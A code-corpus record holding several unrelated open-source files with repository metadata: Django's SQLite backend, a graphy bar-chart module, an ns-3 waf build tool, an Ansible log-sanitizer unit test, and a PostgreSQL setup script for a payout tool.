ignore_this_directory/django/db/backends/sqlite3/base.py
3
22958
""" SQLite backend for the sqlite3 module in the standard library. """ import datetime import decimal import functools import math import operator import re import statistics import warnings from itertools import chain from sqlite3 import dbapi2 as Database import pytz from django.core.exceptions import ImproperlyConfigured from django.db import utils from django.db.backends import utils as backend_utils from django.db.backends.base.base import BaseDatabaseWrapper from django.utils import timezone from django.utils.dateparse import parse_datetime, parse_time from django.utils.duration import duration_microseconds from .client import DatabaseClient # isort:skip from .creation import DatabaseCreation # isort:skip from .features import DatabaseFeatures # isort:skip from .introspection import DatabaseIntrospection # isort:skip from .operations import DatabaseOperations # isort:skip from .schema import DatabaseSchemaEditor # isort:skip def decoder(conv_func): """ Convert bytestrings from Python's sqlite3 interface to a regular string. """ return lambda s: conv_func(s.decode()) def none_guard(func): """ Decorator that returns None if any of the arguments to the decorated function are None. Many SQL functions return NULL if any of their arguments are NULL. This decorator simplifies the implementation of this for the custom functions registered below. """ @functools.wraps(func) def wrapper(*args, **kwargs): return None if None in args else func(*args, **kwargs) return wrapper def list_aggregate(function): """ Return an aggregate class that accumulates values in a list and applies the provided function to the data. """ return type('ListAggregate', (list,), {'finalize': function, 'step': list.append}) def check_sqlite_version(): if Database.sqlite_version_info < (3, 8, 3): raise ImproperlyConfigured('SQLite 3.8.3 or later is required (found %s).' % Database.sqlite_version) check_sqlite_version() Database.register_converter("bool", b'1'.__eq__) Database.register_converter("time", decoder(parse_time)) Database.register_converter("datetime", decoder(parse_datetime)) Database.register_converter("timestamp", decoder(parse_datetime)) Database.register_converter("TIMESTAMP", decoder(parse_datetime)) Database.register_adapter(decimal.Decimal, str) class DatabaseWrapper(BaseDatabaseWrapper): vendor = 'sqlite' display_name = 'SQLite' # SQLite doesn't actually support most of these types, but it "does the right # thing" given more verbose field definitions, so leave them as is so that # schema inspection is more useful. data_types = { 'AutoField': 'integer', 'BigAutoField': 'integer', 'BinaryField': 'BLOB', 'BooleanField': 'bool', 'CharField': 'varchar(%(max_length)s)', 'DateField': 'date', 'DateTimeField': 'datetime', 'DecimalField': 'decimal', 'DurationField': 'bigint', 'FileField': 'varchar(%(max_length)s)', 'FilePathField': 'varchar(%(max_length)s)', 'FloatField': 'real', 'IntegerField': 'integer', 'BigIntegerField': 'bigint', 'IPAddressField': 'char(15)', 'GenericIPAddressField': 'char(39)', 'NullBooleanField': 'bool', 'OneToOneField': 'integer', 'PositiveIntegerField': 'integer unsigned', 'PositiveSmallIntegerField': 'smallint unsigned', 'SlugField': 'varchar(%(max_length)s)', 'SmallIntegerField': 'smallint', 'TextField': 'text', 'TimeField': 'time', 'UUIDField': 'char(32)', } data_type_check_constraints = { 'PositiveIntegerField': '"%(column)s" >= 0', 'PositiveSmallIntegerField': '"%(column)s" >= 0', } data_types_suffix = { 'AutoField': 'AUTOINCREMENT', 'BigAutoField': 'AUTOINCREMENT', } # SQLite requires LIKE statements to include an ESCAPE clause if the value # being escaped has a percent or underscore in it. # See https://www.sqlite.org/lang_expr.html for an explanation. operators = { 'exact': '= %s', 'iexact': "LIKE %s ESCAPE '\\'", 'contains': "LIKE %s ESCAPE '\\'", 'icontains': "LIKE %s ESCAPE '\\'", 'regex': 'REGEXP %s', 'iregex': "REGEXP '(?i)' || %s", 'gt': '> %s', 'gte': '>= %s', 'lt': '< %s', 'lte': '<= %s', 'startswith': "LIKE %s ESCAPE '\\'", 'endswith': "LIKE %s ESCAPE '\\'", 'istartswith': "LIKE %s ESCAPE '\\'", 'iendswith': "LIKE %s ESCAPE '\\'", } # The patterns below are used to generate SQL pattern lookup clauses when # the right-hand side of the lookup isn't a raw string (it might be an expression # or the result of a bilateral transformation). # In those cases, special characters for LIKE operators (e.g. \, *, _) should be # escaped on database side. # # Note: we use str.format() here for readability as '%' is used as a wildcard for # the LIKE operator. pattern_esc = r"REPLACE(REPLACE(REPLACE({}, '\', '\\'), '%%', '\%%'), '_', '\_')" pattern_ops = { 'contains': r"LIKE '%%' || {} || '%%' ESCAPE '\'", 'icontains': r"LIKE '%%' || UPPER({}) || '%%' ESCAPE '\'", 'startswith': r"LIKE {} || '%%' ESCAPE '\'", 'istartswith': r"LIKE UPPER({}) || '%%' ESCAPE '\'", 'endswith': r"LIKE '%%' || {} ESCAPE '\'", 'iendswith': r"LIKE '%%' || UPPER({}) ESCAPE '\'", } Database = Database SchemaEditorClass = DatabaseSchemaEditor # Classes instantiated in __init__(). client_class = DatabaseClient creation_class = DatabaseCreation features_class = DatabaseFeatures introspection_class = DatabaseIntrospection ops_class = DatabaseOperations def get_connection_params(self): settings_dict = self.settings_dict if not settings_dict['NAME']: raise ImproperlyConfigured( "settings.DATABASES is improperly configured. " "Please supply the NAME value.") kwargs = { 'database': settings_dict['NAME'], 'detect_types': Database.PARSE_DECLTYPES | Database.PARSE_COLNAMES, **settings_dict['OPTIONS'], } # Always allow the underlying SQLite connection to be shareable # between multiple threads. The safe-guarding will be handled at a # higher level by the `BaseDatabaseWrapper.allow_thread_sharing` # property. This is necessary as the shareability is disabled by # default in pysqlite and it cannot be changed once a connection is # opened. if 'check_same_thread' in kwargs and kwargs['check_same_thread']: warnings.warn( 'The `check_same_thread` option was provided and set to ' 'True. It will be overridden with False. Use the ' '`DatabaseWrapper.allow_thread_sharing` property instead ' 'for controlling thread shareability.', RuntimeWarning ) kwargs.update({'check_same_thread': False, 'uri': True}) return kwargs def get_new_connection(self, conn_params): conn = Database.connect(**conn_params) conn.create_function("django_date_extract", 2, _sqlite_datetime_extract) conn.create_function("django_date_trunc", 2, _sqlite_date_trunc) conn.create_function("django_datetime_cast_date", 2, _sqlite_datetime_cast_date) conn.create_function("django_datetime_cast_time", 2, _sqlite_datetime_cast_time) conn.create_function("django_datetime_extract", 3, _sqlite_datetime_extract) conn.create_function("django_datetime_trunc", 3, _sqlite_datetime_trunc) conn.create_function("django_time_extract", 2, _sqlite_time_extract) conn.create_function("django_time_trunc", 2, _sqlite_time_trunc) conn.create_function("django_time_diff", 2, _sqlite_time_diff) conn.create_function("django_timestamp_diff", 2, _sqlite_timestamp_diff) conn.create_function("django_format_dtdelta", 3, _sqlite_format_dtdelta) conn.create_function('regexp', 2, _sqlite_regexp) conn.create_function('ACOS', 1, none_guard(math.acos)) conn.create_function('ASIN', 1, none_guard(math.asin)) conn.create_function('ATAN', 1, none_guard(math.atan)) conn.create_function('ATAN2', 2, none_guard(math.atan2)) conn.create_function('CEILING', 1, none_guard(math.ceil)) conn.create_function('COS', 1, none_guard(math.cos)) conn.create_function('COT', 1, none_guard(lambda x: 1 / math.tan(x))) conn.create_function('DEGREES', 1, none_guard(math.degrees)) conn.create_function('EXP', 1, none_guard(math.exp)) conn.create_function('FLOOR', 1, none_guard(math.floor)) conn.create_function('LN', 1, none_guard(math.log)) conn.create_function('LOG', 2, none_guard(lambda x, y: math.log(y, x))) conn.create_function('LPAD', 3, _sqlite_lpad) conn.create_function('MOD', 2, none_guard(math.fmod)) conn.create_function('PI', 0, lambda: math.pi) conn.create_function('POWER', 2, none_guard(operator.pow)) conn.create_function('RADIANS', 1, none_guard(math.radians)) conn.create_function('REPEAT', 2, none_guard(operator.mul)) conn.create_function('REVERSE', 1, none_guard(lambda x: x[::-1])) conn.create_function('RPAD', 3, _sqlite_rpad) conn.create_function('SIN', 1, none_guard(math.sin)) conn.create_function('SQRT', 1, none_guard(math.sqrt)) conn.create_function('TAN', 1, none_guard(math.tan)) conn.create_aggregate('STDDEV_POP', 1, list_aggregate(statistics.pstdev)) conn.create_aggregate('STDDEV_SAMP', 1, list_aggregate(statistics.stdev)) conn.create_aggregate('VAR_POP', 1, list_aggregate(statistics.pvariance)) conn.create_aggregate('VAR_SAMP', 1, list_aggregate(statistics.variance)) conn.execute('PRAGMA foreign_keys = ON') return conn def init_connection_state(self): pass def create_cursor(self, name=None): return self.connection.cursor(factory=SQLiteCursorWrapper) def close(self): self.validate_thread_sharing() # If database is in memory, closing the connection destroys the # database. To prevent accidental data loss, ignore close requests on # an in-memory db. if not self.is_in_memory_db(): BaseDatabaseWrapper.close(self) def _savepoint_allowed(self): # When 'isolation_level' is not None, sqlite3 commits before each # savepoint; it's a bug. When it is None, savepoints don't make sense # because autocommit is enabled. The only exception is inside 'atomic' # blocks. To work around that bug, on SQLite, 'atomic' starts a # transaction explicitly rather than simply disable autocommit. return self.in_atomic_block def _set_autocommit(self, autocommit): if autocommit: level = None else: # sqlite3's internal default is ''. It's different from None. # See Modules/_sqlite/connection.c. level = '' # 'isolation_level' is a misleading API. # SQLite always runs at the SERIALIZABLE isolation level. with self.wrap_database_errors: self.connection.isolation_level = level def disable_constraint_checking(self): with self.cursor() as cursor: cursor.execute('PRAGMA foreign_keys = OFF') # Foreign key constraints cannot be turned off while in a multi- # statement transaction. Fetch the current state of the pragma # to determine if constraints are effectively disabled. enabled = cursor.execute('PRAGMA foreign_keys').fetchone()[0] return not bool(enabled) def enable_constraint_checking(self): self.cursor().execute('PRAGMA foreign_keys = ON') def check_constraints(self, table_names=None): """ Check each table name in `table_names` for rows with invalid foreign key references. This method is intended to be used in conjunction with `disable_constraint_checking()` and `enable_constraint_checking()`, to determine if rows with invalid references were entered while constraint checks were off. """ if self.features.supports_pragma_foreign_key_check: with self.cursor() as cursor: if table_names is None: violations = self.cursor().execute('PRAGMA foreign_key_check').fetchall() else: violations = chain.from_iterable( cursor.execute('PRAGMA foreign_key_check(%s)' % table_name).fetchall() for table_name in table_names ) # See https://www.sqlite.org/pragma.html#pragma_foreign_key_check for table_name, rowid, referenced_table_name, foreign_key_index in violations: foreign_key = cursor.execute( 'PRAGMA foreign_key_list(%s)' % table_name ).fetchall()[foreign_key_index] column_name, referenced_column_name = foreign_key[3:5] primary_key_column_name = self.introspection.get_primary_key_column(cursor, table_name) primary_key_value, bad_value = cursor.execute( 'SELECT %s, %s FROM %s WHERE rowid = %%s' % ( primary_key_column_name, column_name, table_name ), (rowid,), ).fetchone() raise utils.IntegrityError( "The row in table '%s' with primary key '%s' has an " "invalid foreign key: %s.%s contains a value '%s' that " "does not have a corresponding value in %s.%s." % ( table_name, primary_key_value, table_name, column_name, bad_value, referenced_table_name, referenced_column_name ) ) else: with self.cursor() as cursor: if table_names is None: table_names = self.introspection.table_names(cursor) for table_name in table_names: primary_key_column_name = self.introspection.get_primary_key_column(cursor, table_name) if not primary_key_column_name: continue key_columns = self.introspection.get_key_columns(cursor, table_name) for column_name, referenced_table_name, referenced_column_name in key_columns: cursor.execute( """ SELECT REFERRING.`%s`, REFERRING.`%s` FROM `%s` as REFERRING LEFT JOIN `%s` as REFERRED ON (REFERRING.`%s` = REFERRED.`%s`) WHERE REFERRING.`%s` IS NOT NULL AND REFERRED.`%s` IS NULL """ % ( primary_key_column_name, column_name, table_name, referenced_table_name, column_name, referenced_column_name, column_name, referenced_column_name, ) ) for bad_row in cursor.fetchall(): raise utils.IntegrityError( "The row in table '%s' with primary key '%s' has an " "invalid foreign key: %s.%s contains a value '%s' that " "does not have a corresponding value in %s.%s." % ( table_name, bad_row[0], table_name, column_name, bad_row[1], referenced_table_name, referenced_column_name, ) ) def is_usable(self): return True def _start_transaction_under_autocommit(self): """ Start a transaction explicitly in autocommit mode. Staying in autocommit mode works around a bug of sqlite3 that breaks savepoints when autocommit is disabled. """ self.cursor().execute("BEGIN") def is_in_memory_db(self): return self.creation.is_in_memory_db(self.settings_dict['NAME']) FORMAT_QMARK_REGEX = re.compile(r'(?<!%)%s') class SQLiteCursorWrapper(Database.Cursor): """ Django uses "format" style placeholders, but pysqlite2 uses "qmark" style. This fixes it -- but note that if you want to use a literal "%s" in a query, you'll need to use "%%s". """ def execute(self, query, params=None): if params is None: return Database.Cursor.execute(self, query) query = self.convert_query(query) return Database.Cursor.execute(self, query, params) def executemany(self, query, param_list): query = self.convert_query(query) return Database.Cursor.executemany(self, query, param_list) def convert_query(self, query): return FORMAT_QMARK_REGEX.sub('?', query).replace('%%', '%') def _sqlite_datetime_parse(dt, tzname=None): if dt is None: return None try: dt = backend_utils.typecast_timestamp(dt) except (TypeError, ValueError): return None if tzname is not None: dt = timezone.localtime(dt, pytz.timezone(tzname)) return dt def _sqlite_date_trunc(lookup_type, dt): dt = _sqlite_datetime_parse(dt) if dt is None: return None if lookup_type == 'year': return "%i-01-01" % dt.year elif lookup_type == 'quarter': month_in_quarter = dt.month - (dt.month - 1) % 3 return '%i-%02i-01' % (dt.year, month_in_quarter) elif lookup_type == 'month': return "%i-%02i-01" % (dt.year, dt.month) elif lookup_type == 'week': dt = dt - datetime.timedelta(days=dt.weekday()) return "%i-%02i-%02i" % (dt.year, dt.month, dt.day) elif lookup_type == 'day': return "%i-%02i-%02i" % (dt.year, dt.month, dt.day) def _sqlite_time_trunc(lookup_type, dt): if dt is None: return None try: dt = backend_utils.typecast_time(dt) except (ValueError, TypeError): return None if lookup_type == 'hour': return "%02i:00:00" % dt.hour elif lookup_type == 'minute': return "%02i:%02i:00" % (dt.hour, dt.minute) elif lookup_type == 'second': return "%02i:%02i:%02i" % (dt.hour, dt.minute, dt.second) def _sqlite_datetime_cast_date(dt, tzname): dt = _sqlite_datetime_parse(dt, tzname) if dt is None: return None return dt.date().isoformat() def _sqlite_datetime_cast_time(dt, tzname): dt = _sqlite_datetime_parse(dt, tzname) if dt is None: return None return dt.time().isoformat() def _sqlite_datetime_extract(lookup_type, dt, tzname=None): dt = _sqlite_datetime_parse(dt, tzname) if dt is None: return None if lookup_type == 'week_day': return (dt.isoweekday() % 7) + 1 elif lookup_type == 'week': return dt.isocalendar()[1] elif lookup_type == 'quarter': return math.ceil(dt.month / 3) elif lookup_type == 'iso_year': return dt.isocalendar()[0] else: return getattr(dt, lookup_type) def _sqlite_datetime_trunc(lookup_type, dt, tzname): dt = _sqlite_datetime_parse(dt, tzname) if dt is None: return None if lookup_type == 'year': return "%i-01-01 00:00:00" % dt.year elif lookup_type == 'quarter': month_in_quarter = dt.month - (dt.month - 1) % 3 return '%i-%02i-01 00:00:00' % (dt.year, month_in_quarter) elif lookup_type == 'month': return "%i-%02i-01 00:00:00" % (dt.year, dt.month) elif lookup_type == 'week': dt = dt - datetime.timedelta(days=dt.weekday()) return "%i-%02i-%02i 00:00:00" % (dt.year, dt.month, dt.day) elif lookup_type == 'day': return "%i-%02i-%02i 00:00:00" % (dt.year, dt.month, dt.day) elif lookup_type == 'hour': return "%i-%02i-%02i %02i:00:00" % (dt.year, dt.month, dt.day, dt.hour) elif lookup_type == 'minute': return "%i-%02i-%02i %02i:%02i:00" % (dt.year, dt.month, dt.day, dt.hour, dt.minute) elif lookup_type == 'second': return "%i-%02i-%02i %02i:%02i:%02i" % (dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second) def _sqlite_time_extract(lookup_type, dt): if dt is None: return None try: dt = backend_utils.typecast_time(dt) except (ValueError, TypeError): return None return getattr(dt, lookup_type) @none_guard def _sqlite_format_dtdelta(conn, lhs, rhs): """ LHS and RHS can be either: - An integer number of microseconds - A string representing a datetime """ try: real_lhs = datetime.timedelta(0, 0, lhs) if isinstance(lhs, int) else backend_utils.typecast_timestamp(lhs) real_rhs = datetime.timedelta(0, 0, rhs) if isinstance(rhs, int) else backend_utils.typecast_timestamp(rhs) if conn.strip() == '+': out = real_lhs + real_rhs else: out = real_lhs - real_rhs except (ValueError, TypeError): return None # typecast_timestamp returns a date or a datetime without timezone. # It will be formatted as "%Y-%m-%d" or "%Y-%m-%d %H:%M:%S[.%f]" return str(out) @none_guard def _sqlite_time_diff(lhs, rhs): left = backend_utils.typecast_time(lhs) right = backend_utils.typecast_time(rhs) return ( (left.hour * 60 * 60 * 1000000) + (left.minute * 60 * 1000000) + (left.second * 1000000) + (left.microsecond) - (right.hour * 60 * 60 * 1000000) - (right.minute * 60 * 1000000) - (right.second * 1000000) - (right.microsecond) ) @none_guard def _sqlite_timestamp_diff(lhs, rhs): left = backend_utils.typecast_timestamp(lhs) right = backend_utils.typecast_timestamp(rhs) return duration_microseconds(left - right) @none_guard def _sqlite_regexp(re_pattern, re_string): return bool(re.search(re_pattern, str(re_string))) @none_guard def _sqlite_lpad(text, length, fill_text): if len(text) >= length: return text[:length] return (fill_text * length)[:length - len(text)] + text @none_guard def _sqlite_rpad(text, length, fill_text): return (text + fill_text * length)[:length]
mit
sahiljain/catapult
third_party/graphy/graphy/bar_chart.py
233
5769
#!/usr/bin/python2.4 # # Copyright 2008 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Code related to bar charts.""" import copy import warnings from graphy import common from graphy import util class BarsStyle(object): """Style of a series of bars in a BarChart Object Attributes: color: Hex string, like '00ff00' for green """ def __init__(self, color): self.color = color class BarChartStyle(object): """Represents the style for bars on a BarChart. Any of the object attributes may be set to None, in which case the value will be auto-calculated. Object Attributes: bar_thickness: The thickness of a bar, in pixels. bar_gap: The gap between bars, in pixels, or as a fraction of bar thickness if use_fractional_gap_spacing is True. group_gap: The gap between groups of bars, in pixels, or as a fraction of bar thickness if use_fractional_gap_spacing is True. use_fractional_gap_spacing: if True, bar_gap and group_gap specify gap sizes as a fraction of bar width. Default is False. """ _DEFAULT_GROUP_GAP = 8 _DEFAULT_BAR_GAP = 4 def __init__(self, bar_thickness=None, bar_gap=_DEFAULT_BAR_GAP, group_gap=_DEFAULT_GROUP_GAP, use_fractional_gap_spacing=False): """Create a new BarChartStyle. Args: bar_thickness: The thickness of a bar, in pixels. Set this to None if you want the bar thickness to be auto-calculated (this is the default behaviour). bar_gap: The gap between bars, in pixels. Default is 4. group_gap: The gap between groups of bars, in pixels. Default is 8. """ self.bar_thickness = bar_thickness self.bar_gap = bar_gap self.group_gap = group_gap self.use_fractional_gap_spacing = use_fractional_gap_spacing class BarStyle(BarChartStyle): def __init__(self, *args, **kwargs): warnings.warn('BarStyle is deprecated. Use BarChartStyle.', DeprecationWarning, stacklevel=2) super(BarStyle, self).__init__(*args, **kwargs) class BarChart(common.BaseChart): """Represents a bar chart. Object attributes: vertical: if True, the bars will be vertical. Default is True. stacked: if True, the bars will be stacked. Default is False. style: The BarChartStyle for all bars on this chart, specifying bar thickness and gaps between bars. """ def __init__(self, points=None): """Constructor for BarChart objects.""" super(BarChart, self).__init__() if points is not None: self.AddBars(points) self.vertical = True self.stacked = False self.style = BarChartStyle(None, None, None) # full auto def AddBars(self, points, label=None, color=None): """Add a series of bars to the chart. points: List of y-values for the bars in this series label: Name of the series (used in the legend) color: Hex string, like '00ff00' for green This is a convenience method which constructs & appends the DataSeries for you. """ if label is not None and util._IsColor(label): warnings.warn('Your code may be broken! ' 'Label is a hex triplet. Maybe it is a color? The ' 'old argument order (color before label) is deprecated.', DeprecationWarning, stacklevel=2) style = BarsStyle(color) series = common.DataSeries(points, label=label, style=style) self.data.append(series) return series def GetDependentAxes(self): """Get the dependendant axes, which depend on orientation.""" if self.vertical: return (self._axes[common.AxisPosition.LEFT] + self._axes[common.AxisPosition.RIGHT]) else: return (self._axes[common.AxisPosition.TOP] + self._axes[common.AxisPosition.BOTTOM]) def GetIndependentAxes(self): """Get the independendant axes, which depend on orientation.""" if self.vertical: return (self._axes[common.AxisPosition.TOP] + self._axes[common.AxisPosition.BOTTOM]) else: return (self._axes[common.AxisPosition.LEFT] + self._axes[common.AxisPosition.RIGHT]) def GetDependentAxis(self): """Get the main dependendant axis, which depends on orientation.""" if self.vertical: return self.left else: return self.bottom def GetIndependentAxis(self): """Get the main independendant axis, which depends on orientation.""" if self.vertical: return self.bottom else: return self.left def GetMinMaxValues(self): """Get the largest & smallest bar values as (min_value, max_value).""" if not self.stacked: return super(BarChart, self).GetMinMaxValues() if not self.data: return None, None # No data, nothing to do. num_bars = max(len(series.data) for series in self.data) positives = [0 for i in xrange(0, num_bars)] negatives = list(positives) for series in self.data: for i, point in enumerate(series.data): if point: if point > 0: positives[i] += point else: negatives[i] += point min_value = min(min(positives), min(negatives)) max_value = max(max(positives), max(negatives)) return min_value, max_value
bsd-3-clause
nsol-nmsu/ns3-smartgrid
waf-tools/command.py
5
4202
import re import subprocess # import feature, taskgen_method, before_method, task_gen from waflib import TaskGen, Node, Task, Utils, Build, Options, Logs, Task debug = Logs.debug error = Logs.error import shellcmd #shellcmd.subprocess = pproc # the WAF version of the subprocess module is supposedly less buggy shellcmd.debug = debug arg_rx = re.compile(r"(?P<dollar>\$\$)|(?P<subst>\$\{(?P<var>\w+)(?P<code>.*?)\})", re.M) class command_task(Task.Task): color = "BLUE" def __init__(self, env, generator): Task.Task.__init__(self, env=env, normal=1, generator=generator) def __str__(self): "string to display to the user" env = self.env src_str = ' '.join([a.path_from(a.ctx.launch_node()) for a in self.inputs]) tgt_str = ' '.join([a.path_from(a.ctx.launch_node()) for a in self.outputs]) if self.outputs: sep = ' -> ' else: sep = '' pipeline = shellcmd.Pipeline() pipeline.parse(self.generator.command) cmd = pipeline.get_abbreviated_command() return 'command (%s): %s%s%s' % (cmd, src_str, sep, tgt_str) def _subst_arg(self, arg, direction, namespace): """ @param arg: the command argument (or stdin/stdout/stderr) to substitute @param direction: direction of the argument: 'in', 'out', or None """ def repl(match): if match.group('dollar'): return "$" elif match.group('subst'): var = match.group('var') code = match.group('code') result = eval(var+code, namespace) if isinstance(result, Node.Node): if var == 'TGT': return result.get_bld().abspath() elif var == 'SRC': return result.srcpath() else: raise ValueError("Bad subst variable %r" % var) elif result is self.inputs: if len(self.inputs) == 1: return result[0].srcpath() else: raise ValueError("${SRC} requested but have multiple sources; which one?") elif result is self.outputs: if len(self.outputs) == 1: return result[0].get_bld().abspath() else: raise ValueError("${TGT} requested but have multiple targets; which one?") elif isinstance(result, list): assert len(result) == 1 return result[0] else: return result return None return arg_rx.sub(repl, arg) def run(self): pipeline = shellcmd.Pipeline() pipeline.parse(self.generator.command) namespace = self.env.get_merged_dict() if self.generator.variables is not None: namespace.update(self.generator.variables) namespace.update(env=self.env, SRC=self.inputs, TGT=self.outputs) for cmd in pipeline.pipeline: if isinstance(cmd, shellcmd.Command): if isinstance(cmd.stdin, basestring): cmd.stdin = self._subst_arg(cmd.stdin, 'in', namespace) if isinstance(cmd.stdout, basestring): cmd.stdout = self._subst_arg(cmd.stdout, 'out', namespace) if isinstance(cmd.stderr, basestring): cmd.stderr = self._subst_arg(cmd.stderr, 'out', namespace) for argI in xrange(len(cmd.argv)): cmd.argv[argI] = self._subst_arg(cmd.argv[argI], None, namespace) if cmd.env_vars is not None: env_vars = dict() for name, value in cmd.env_vars.iteritems(): env_vars[name] = self._subst_arg(value, None, namespace) cmd.env_vars = env_vars elif isinstance(cmd, shellcmd.Chdir): cmd.dir = self._subst_arg(cmd.dir, None, namespace) return pipeline.run(verbose=(Options.options.verbose > 0)) @TaskGen.taskgen_method @TaskGen.feature('command') def init_command(self): Utils.def_attrs(self, # other variables that can be used in the command: ${VARIABLE} variables = None, rule='') @TaskGen.feature('command') @TaskGen.after_method('process_rule') def apply_command(self): #self.meths.remove('apply_core') # create the task task = self.create_task('command') setattr(task, "dep_vars", getattr(self, "dep_vars", None)) # process the sources inputs = [] for node in self.source: inputs.append(node) task.set_inputs(inputs) task.set_outputs([self.path.find_or_declare(tgt) for tgt in self.to_list(self.target)]) self.source = '' #Task.file_deps = Task.extract_deps # class command_taskgen(task_gen): # def __init__(self, *k, **kw): # task_gen.__init__(self, *k, **kw) # self.features.append('command')
gpl-2.0
ar7z1/ansible
test/units/module_utils/basic/test_heuristic_log_sanitize.py
56
3727
# -*- coding: utf-8 -*- # (c) 2015, Toshio Kuratomi <tkuratomi@ansible.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # Make coding more python3-ish from __future__ import (absolute_import, division) __metaclass__ = type from units.compat import unittest from ansible.module_utils.basic import heuristic_log_sanitize class TestHeuristicLogSanitize(unittest.TestCase): def setUp(self): self.URL_SECRET = 'http://username:pas:word@foo.com/data' self.SSH_SECRET = 'username:pas:word@foo.com/data' self.clean_data = repr(self._gen_data(3, True, True, 'no_secret_here')) self.url_data = repr(self._gen_data(3, True, True, self.URL_SECRET)) self.ssh_data = repr(self._gen_data(3, True, True, self.SSH_SECRET)) def _gen_data(self, records, per_rec, top_level, secret_text): hostvars = {'hostvars': {}} for i in range(1, records, 1): host_facts = { 'host%s' % i: { 'pstack': { 'running': '875.1', 'symlinked': '880.0', 'tars': [], 'versions': ['885.0'] }, } } if per_rec: host_facts['host%s' % i]['secret'] = secret_text hostvars['hostvars'].update(host_facts) if top_level: hostvars['secret'] = secret_text return hostvars def test_did_not_hide_too_much(self): self.assertEquals(heuristic_log_sanitize(self.clean_data), self.clean_data) def test_hides_url_secrets(self): url_output = heuristic_log_sanitize(self.url_data) # Basic functionality: Successfully hid the password self.assertNotIn('pas:word', url_output) # Slightly more advanced, we hid all of the password despite the ":" self.assertNotIn('pas', url_output) # In this implementation we replace the password with 8 "*" which is # also the length of our password. The url fields should be able to # accurately detect where the password ends so the length should be # the same: self.assertEqual(len(url_output), len(self.url_data)) def test_hides_ssh_secrets(self): ssh_output = heuristic_log_sanitize(self.ssh_data) self.assertNotIn('pas:word', ssh_output) # Slightly more advanced, we hid all of the password despite the ":" self.assertNotIn('pas', ssh_output) # ssh checking is harder as the heuristic is overzealous in many # cases. Since the input will have at least one ":" present before # the password we can tell some things about the beginning and end of # the data, though: self.assertTrue(ssh_output.startswith("{'")) self.assertTrue(ssh_output.endswith("}")) self.assertIn(":********@foo.com/data'", ssh_output) def test_hides_parameter_secrets(self): output = heuristic_log_sanitize('token="secret", user="person", token_entry="test=secret"', frozenset(['secret'])) self.assertNotIn('secret', output)
gpl-3.0
Nijmegen-Consultancy-Group/PayoutScriptArk
install.py
1
4763
import psycopg2 from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT # <-- ADD THIS LINE import logging.handlers import config def create_db(user_name, password): # check if database doesn't already exists try: con = psycopg2.connect(dbname='postgres', user=user_name, host='localhost', password=password) con.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT) # <-- ADD THIS LINE cur = con.cursor() cur.execute("CREATE DATABASE payoutscript_administration") except psycopg2.ProgrammingError: return def create_table_locks(user_name, password): con = psycopg2.connect(dbname='payoutscript_administration', user=user_name, host='localhost', password=password) con.autocommit = True cur = con.cursor() cur.execute("""CREATE TABLE IF NOT EXISTS locks ( id SERIAL PRIMARY KEY, locked BOOLEAN);""") def create_table_delegate(user_name, password): con = psycopg2.connect(dbname='payoutscript_administration', user=user_name, host='localhost', password=password) con.autocommit = True cur = con.cursor() cur.execute("""CREATE TABLE IF NOT EXISTS delegate ( id SERIAL PRIMARY KEY, address VARCHAR(50), reward BIGINT);""") def grant_privileges(user_name, password): con = psycopg2.connect(dbname='payoutscript_administration', user=user_name, host='localhost', password=password) con.autocommit = True cur = con.cursor() cur.execute("""GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO {};""".format(config.CONNECTION['USER'])) def create_empty_lock(user_name, password): con = psycopg2.connect(dbname='payoutscript_administration', user=user_name, host='localhost', password=password) con.autocommit = True cur = con.cursor() cur.execute("""INSERT INTO locks VALUES (1, FALSE) ON CONFLICT DO NOTHING;""") def create_delegate_entry(user_name, password): con = psycopg2.connect(dbname='payoutscript_administration', user=user_name, host='localhost', password=password) con.autocommit = True cur = con.cursor() cur.execute("""INSERT INTO delegate (id, address, reward) VALUES (1, '{}', 0) ON CONFLICT DO NOTHING;;""".format(config.DELEGATE['ADDRESS'])) def create_table_users_payouts(user_name, password): con = psycopg2.connect(dbname='payoutscript_administration', user=user_name, host='localhost', password=password) con.autocommit = True cur = con.cursor() cur.execute("""CREATE TABLE IF NOT EXISTS users_payouts ( address VARCHAR(50) PRIMARY KEY, payout BIGINT, last_payout BIGINT);""") if __name__ == '__main__': # Initialize logging logger = logging.getLogger(__name__) handler = logging.handlers.RotatingFileHandler(config.LOGGING['LOGDIR'], encoding='utf-8', maxBytes=10 * 1024 * 1024, backupCount=5) formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s') handler.setFormatter(formatter) logger.addHandler(handler) logger.setLevel(config.LOGGING['LOGGING_LEVEL']) user_name = input('Please provide a psql user eligble to create a database: ') password = input('Please provide the password of psql user "{}": '.format(user_name)) print('Creating database') create_db(user_name, password) print('Success') print('creating tables') create_table_locks(user_name, password) create_table_delegate(user_name, password) create_table_users_payouts(user_name, password) print('Success') print('granting privileges') grant_privileges(user_name, password) print('success') print('creating lock') create_empty_lock(user_name, password) print('success') print('creating delegate entry') create_delegate_entry(user_name, password) print('success')
mit
codingkevin/suds
suds/xsd/__init__.py
18
2609
